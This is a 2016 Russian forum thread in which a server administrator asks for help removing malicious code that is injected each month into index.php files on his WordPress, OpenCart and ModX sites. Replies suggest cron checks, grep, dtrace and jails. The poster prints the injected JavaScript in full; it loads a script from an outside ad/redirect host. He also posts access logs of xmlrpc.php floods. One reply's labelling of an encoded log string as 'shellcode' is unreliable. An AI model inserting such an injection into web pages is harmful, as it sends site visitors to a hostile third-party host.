Помогите извести вредный код

gyurza2000

Наверное оффтоп, но, не нашёл куда обратиться. Тут, помню, многие проблемы решать помогали.
Вобщем, что то завелось на серваке, вычислить не могу.
18го числа каждого месяца в файлики index.php первой строкой прописывается зловредный код.
Пароли все менял уже неоднократно, FTP нет, с винды по SSH на сервак в качестве эксперимента уже месяц не ходил
Логи...обрываются до начала работы этой хрени (ну или, скорее, подчищаются после работы этой хрени до безобидных строчек)

Как отловить?

Отправлено спустя 30 минут 56 секунд:

Код: Выделить всё

<script type="text/javascript"> (function(w) { var s = document.createElement('script'); var z = setInterval(function() { if (document.readyState == 'interactive' || document.readyState == 'complete') { clearInterval(z); s.src = "http://92007.w4statistics.info/click.php?p=279773&adult=1&c"; s.async = true; s.type = type = 'text/javascript'; w.document.body.appendChild(s); } }, 200); })(window); </script>

Хостинг HostFood.ru · **Хостинг HostFood.ru**

Тарифы на хостинг в России, от 12 рублей: https://www.host-food.ru/tariffs/hosting/
Тарифы на виртуальные сервера (VPS/VDS/KVM) в РФ, от 189 руб.: https://www.host-food.ru/tariffs/virtualny-server-vps/
Выделенные сервера, Россия, Москва, от 2000 рублей (HP Proliant G5, Intel Xeon E5430 (2.66GHz, Quad-Core, 12Mb), 8Gb RAM, 2x300Gb SAS HDD, P400i, 512Mb, BBU):
https://www.host-food.ru/tariffs/vydelennyi-server-ds/
Недорогие домены в популярных зонах: https://www.host-food.ru/domains/

dekloper

gyurza2000 писал(а): Как отловить?

рид онли ему поставить и dtrace-ом глядеть какая тварь до него докапывается..

Electronik

gyurza2000 писал(а): 18го числа каждого месяца в файлики index.php первой строкой прописывается зловредный код.

крон смотрели?

gyurza2000

Крон смотрел первым делом. Ничего. Read Only поставил.
В каталогах где WWW ничего не нахожу подозрительного. Может какой SHELL завёлся?

Отправлено спустя 2 минуты 56 секунд:
DTrace...боюсь не осилю. Я ни разу не программист. Скрипты писать не умею

Electronik

а что крутится на этом WWW?

gyurza2000

несколько сайтиков:
WordPress, OpenCart, ModX

Electronik

gyurza2000 писал(а): WordPress

ищите там

gyurza2000

да где там искать то...их несколько и куда искать, опыта не имею. Так вроде подозрительных чужеродных файлов не вижу

xM · Непрочитанное сообщение xM » 2016-06-20 15:29:57

Electronik писал(а): ищите там

+100500

Непрочитанное сообщение **FreeBSP** » 2016-06-20 15:43:56

grep -rin '92007.w4statistics.info'

gyurza2000

grep -rin '92007.w4statistics.info'

А если закодирован?Вечером попробую...спасибо

snorlov · Непрочитанное сообщение **snorlov** » 2016-06-20 16:35:08

gyurza2000 писал(а):несколько сайтиков:
WordPress, OpenCart, ModX

А почитать про их уязвимости и сравнить что рекомендуют юзать и что стоит на сервере религия не позволяет...

gyurza2000

Я атеист

В каком смысле, что стоит на сервере?Я знаю, что на сервере стоит. А WordPressы друзей знакомых. В них очень не хот елось бы лезть. Хотелось бы всё это со стороны сервера прикрыть, а не со стороны CMS

xM · Непрочитанное сообщение xM » 2016-06-20 16:43:25

gyurza2000 писал(а): Хотелось бы всё это со стороны сервера прикрыть, а не со стороны CMS

Всех в jail'ы и смотреть где будет нехорошо.

gyurza2000

Всех в jail'ы

...ух. Пойду курить Jail. Ни когда не сталкивался

xM · Непрочитанное сообщение xM » 2016-06-20 17:29:40

gyurza2000 писал(а): ...ух. Пойду курить Jail. Ни когда не сталкивался

В любом случае это вас не избавит от отлова зловреда в системе. Так что я бы лучше начал с этого.
А после чистки уже можно всех раскидать по клеткам для минимизации возможного ущерба в будущем.

Отправлено спустя 16 минут 29 секунд:
Почитайте вот, и комментарии тоже.
https://habrahabr.ru/company/sprinthost/blog/125839/
Возможно поможет.

gyurza2000

ОК. Спасибо. Эту статью уже читал

snorlov · Непрочитанное сообщение **snorlov** » 2016-06-20 22:16:57

gyurza2000 писал(а):Я атеист В каком смысле, что стоит на сервере?Я знаю, что на сервере стоит. А WordPressы друзей знакомых. В них очень не хот елось бы лезть. Хотелось бы всё это со стороны сервера прикрыть, а не со стороны CMS

Сервер то ваш, а не друзей знакомых, они доверились вам, а не мне, и ломают вас, а не их через софт, который вы поставили... Клетки дадут только изоляцию, но проблему не снимут, будут же ломать клетку, только потери будут меньшие, а может быть и такие же...

Electronik

snorlov писал(а): только потери будут меньшие, а может быть и такие же...

думаю такие же, т.к белый IP всё равно будет сервера ТС, конечно если каждой клетке не дать по белому IP. единственный плюс, не сольют БД других сайтов.

Отправлено спустя 20 минут 17 секунд:
кстати у CMS'ок есть свой cron

xM · Непрочитанное сообщение xM » 2016-06-20 23:04:32

Electronik писал(а): единственный плюс, не сольют БД других сайтов.

Ну это как один из плюсов. Не инфицируют другие сайты, не получат потенциальный доступ к другим сервисам и т.п. Дырки бывают такие, что и рута получить можно. В любом случае, с jail ущерб наверняка будет меньше и разбираться с ним будет проще.

Отправлено спустя 1 минуту 42 секунды:

Electronik писал(а): кстати у CMS'ок есть свой cron

Как вариант. Кстати, тут крон вообще и не нужен. Если инфицированная страница сайта посещаема хотя бы раз в сутки ничто не мешает зловреду проверять дату и активироваться в нужное число.

Electronik

xM писал(а): Не инфицируют другие сайты,

Ну если не инфицировали несколько раз до этого, у ТС не в первый раз страницу заражают, то скорее всего действует бот. Ломали бы в ручную, остальные сайты тоже бы инфицировали. С jail в любом случае плюс, тем более не намного производительность падает.

gyurza2000

нашёл кое какие логи. По времени вроде бы подходит:

Код: Выделить всё

157.55.39.2 - - [18/Jun/2016:12:24:35 +0400] "GET /search.html?filter_tag=\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xba\xc3\x83\xc6\x92\xc3\xa2\xe2\x82\xac\xcb\x9c\xc3\x83\xc2\xa2\xc3\xa2\xe2\x82\xac\xc5\xa1\xc3\x82\xc2\xac\xc3\x83\xc6\x92\xc3\xa2\xe2\x82\xac\xcb\x9c\xc3\x83\xe2\x80\xa0\xc3\xa2\xe2\x82\xac\xe2\x84\xa2\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb3\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbe\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb2\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbe\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb9%20\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbf\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbe\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbb\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb8\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb2 HTTP/1.1" 200 67131
157.55.39.2 - - [18/Jun/2016:12:24:35 +0400] "GET /search.html?filter_tag=\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xba\xc3\x83\xc6\x92\xc3\xa2\xe2\x82\xac\xcb\x9c\xc3\x83\xc2\xa2\xc3\xa2\xe2\x82\xac\xc5\xa1\xc3\x82\xc2\xac\xc3\x83\xc6\x92\xc3\xa2\xe2\x82\xac\xcb\x9c\xc3\x83\xe2\x80\xa0\xc3\xa2\xe2\x82\xac\xe2\x84\xa2\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb3\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbe\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb2\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbe\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb9%20\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbf\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbe\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbb\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb8\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb2 HTTP/1.1" 200 67131

Данные записи выделяются на фоне остальных...

Отправлено спустя 6 минут 59 секунд:
Это было на OpenCart

А это на WP, чуть раньше:

Код: Выделить всё

146.185.251.210 - - [18/Jun/2016:12:17:05 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.248 - - [18/Jun/2016:12:17:12 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.249 - - [18/Jun/2016:12:17:16 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.249 - - [18/Jun/2016:12:17:40 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:18:09 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.247 - - [18/Jun/2016:12:18:03 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.253 - - [18/Jun/2016:12:20:16 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:20:30 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:20:30 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.253 - - [18/Jun/2016:12:20:49 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.247 - - [18/Jun/2016:12:21:39 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:22:12 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:22:20 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.248 - - [18/Jun/2016:12:22:20 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.248 - - [18/Jun/2016:12:22:24 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:22:38 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.249 - - [18/Jun/2016:12:22:27 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.249 - - [18/Jun/2016:12:22:42 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.247 - - [18/Jun/2016:12:23:26 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:24:13 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:24:22 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:25:09 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:25:34 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.253 - - [18/Jun/2016:12:26:22 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.253 - - [18/Jun/2016:12:26:33 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:26:52 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:27:12 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.249 - - [18/Jun/2016:12:27:24 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.248 - - [18/Jun/2016:12:27:34 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.248 - - [18/Jun/2016:12:27:42 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.253 - - [18/Jun/2016:12:27:44 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.249 - - [18/Jun/2016:12:27:46 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:28:37 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:28:41 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.247 - - [18/Jun/2016:12:28:38 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:29:03 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.247 - - [18/Jun/2016:12:32:14 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:32:32 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.249 - - [18/Jun/2016:12:32:31 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.248 - - [18/Jun/2016:12:32:43 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.248 - - [18/Jun/2016:12:32:45 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.249 - - [18/Jun/2016:12:32:50 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.247 - - [18/Jun/2016:12:34:00 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:34:17 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.253 - - [18/Jun/2016:12:34:57 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:36:06 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:36:50 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:37:35 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.253 - - [18/Jun/2016:12:37:33 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.247 - - [18/Jun/2016:12:37:35 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.249 - - [18/Jun/2016:12:37:49 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.249 - - [18/Jun/2016:12:38:02 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.248 - - [18/Jun/2016:12:38:03 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.248 - - [18/Jun/2016:12:38:09 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:38:32 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.247 - - [18/Jun/2016:12:39:23 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
188.143.232.67 - - [18/Jun/2016:12:39:35 +0400] "GET /wp-login.php HTTP/1.1" 200 4321
185.93.185.253 - - [18/Jun/2016:12:40:39 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:41:34 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:42:38 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.247 - - [18/Jun/2016:12:42:53 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.249 - - [18/Jun/2016:12:43:04 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.248 - - [18/Jun/2016:12:43:24 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.248 - - [18/Jun/2016:12:43:30 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.253 - - [18/Jun/2016:12:43:43 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:44:55 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:45:19 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.253 - - [18/Jun/2016:12:46:20 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:46:48 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:46:55 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:47:26 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.249 - - [18/Jun/2016:12:48:11 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:48:48 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.248 - - [18/Jun/2016:12:48:41 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:48:53 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.248 - - [18/Jun/2016:12:48:52 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.253 - - [18/Jun/2016:12:49:01 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:49:40 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:50:13 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.247 - - [18/Jun/2016:12:50:11 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:51:22 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:51:59 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.253 - - [18/Jun/2016:12:52:01 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:53:15 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:53:18 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:53:34 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.249 - - [18/Jun/2016:12:53:43 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.248 - - [18/Jun/2016:12:53:59 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.253 - - [18/Jun/2016:12:54:47 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.253 - - [18/Jun/2016:12:55:02 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.247 - - [18/Jun/2016:12:55:15 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:56:55 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
167.114.1.152 - - [18/Jun/2016:12:57:35 +0400] "POST /xmlrpc.php HTTP/1.1" 200 76196
185.93.185.253 - - [18/Jun/2016:12:57:45 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.247 - - [18/Jun/2016:12:58:37 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:58:56 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.248 - - [18/Jun/2016:12:59:04 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.248 - - [18/Jun/2016:12:59:06 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.247 - - [18/Jun/2016:13:00:18 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:13:00:33 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.253 - - [18/Jun/2016:13:00:46 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:13:01:21 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:13:02:08 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.253 - - [18/Jun/2016:13:02:45 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:13:03:03 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.249 - - [18/Jun/2016:13:04:13 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.248 - - [18/Jun/2016:13:04:14 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.248 - - [18/Jun/2016:13:04:16 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.249 - - [18/Jun/2016:13:04:26 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.247 - - [18/Jun/2016:13:05:25 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:13:06:03 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.253 - - [18/Jun/2016:13:06:19 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:13:07:19 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.247 - - [18/Jun/2016:13:08:52 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.253 - - [18/Jun/2016:13:09:23 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:13:09:40 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:13:10:02 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:13:11:24 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:13:11:28 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:13:11:52 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.253 - - [18/Jun/2016:13:12:05 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:13:13:28 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:13:13:37 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:13:14:15 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.253 - - [18/Jun/2016:13:14:27 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:13:14:51 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
188.143.232.67 - - [18/Jun/2016:13:14:58 +0400] "GET /wp-login.php HTTP/1.1" 200 4321
185.93.185.249 - - [18/Jun/2016:13:14:51 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.248 - - [18/Jun/2016:13:15:02 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.249 - - [18/Jun/2016:13:15:05 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:13:16:00 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:13:16:49 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:13:17:48 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:13:17:56 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:13:18:13 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779

dekloper · Непрочитанное сообщение **dekloper** » 2016-06-21 1:31:06

gyurza2000 писал(а): \xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xba\xc3\x83\xc6\x92\xc3\xa2\xe2\x82\xac\xcb\x9c\xc3\x83\xc2\xa2\xc3\xa2\xe2\x82\xac\xc5\xa1\xc3\x82\xc2\xac\xc3\x83\xc6\x92\xc3\xa2\xe2\x82\xac\xcb\x9c\xc3\x83\xe2\x80\xa0\xc3\xa2\xe2\x82\xac\xe2\x84\xa2\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb3\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbe\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb2\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbe\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb9%20\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbf\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbe\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbb\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb8\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb2

обычный децкий шелкод, дизассемблировать его для начала..
потом можно и.. потренироваться на кошках..

gyurza2000

Успокоили

Чем?

dekloper · Непрочитанное сообщение **dekloper** » 2016-06-21 2:57:07

да не, так мысли вслух, взял себе на заметку..

у вас че фаервола нормального нет, забаньте его к ебеням и всегоделов.. ну как минимум..
ну и коллектив правильно советует, по клеткам их распихать.. если копать ниахота..

forum.lissyara.su